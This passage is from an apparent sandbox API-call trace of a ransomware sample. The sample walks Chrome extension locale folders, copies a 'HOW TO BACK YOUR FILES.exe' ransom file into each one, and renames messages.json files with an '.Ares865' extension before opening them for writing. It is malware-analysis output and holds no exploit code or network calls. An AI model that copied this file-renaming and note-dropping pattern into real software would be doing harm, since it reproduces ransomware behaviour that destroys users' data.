Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.697] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=196) returned 1 [0101.700] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv" [0101.700] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv" [0101.700] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.700] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.701] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.701] GetLastError () returned 0x0 [0101.701] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.701] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fa0520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6a4620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6a4620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.701] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.701] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.701] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.701] lstrlenW (lpString="messages.json") returned 13 [0101.701] lstrlenW (lpString="Ares865") returned 7 [0101.701] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.702] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.Ares865") returned 160 [0101.702] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.703] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0101.707] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr" [0101.707] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr" [0101.707] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.707] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.707] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.708] GetLastError () returned 0x0 [0101.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.708] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fa0520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6a4620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6a4620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.708] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.708] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.708] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.708] lstrlenW (lpString="messages.json") returned 13 [0101.708] lstrlenW (lpString="Ares865") returned 7 [0101.708] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.708] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.Ares865") returned 160 [0101.709] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.710] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=260) returned 1 [0101.715] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl" [0101.716] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl" [0101.716] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.716] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.716] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.717] GetLastError () returned 0x0 [0101.717] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a3c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6ca780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6ca780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.717] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.717] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.717] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.717] lstrlenW (lpString="messages.json") returned 13 [0101.717] lstrlenW (lpString="Ares865") returned 7 [0101.717] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.Ares865") returned 160 [0101.717] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.719] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=190) returned 1 [0101.722] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk" [0101.722] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk" [0101.722] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.722] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.723] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.723] GetLastError () returned 0x0 [0101.723] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.723] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a3c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6f08e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6f08e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.723] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.724] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.724] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.724] lstrlenW (lpString="messages.json") returned 13 [0101.724] lstrlenW (lpString="Ares865") returned 7 [0101.724] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.724] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.Ares865") returned 160 [0101.724] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.726] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=197) returned 1 [0101.728] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si" [0101.728] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si" [0101.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.729] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.729] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.729] GetLastError () returned 0x0 [0101.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a3c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6f08e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6f08e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.730] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.730] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.730] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.730] lstrlenW (lpString="messages.json") returned 13 [0101.730] lstrlenW (lpString="Ares865") returned 7 [0101.730] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.730] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.Ares865") returned 160 [0101.730] 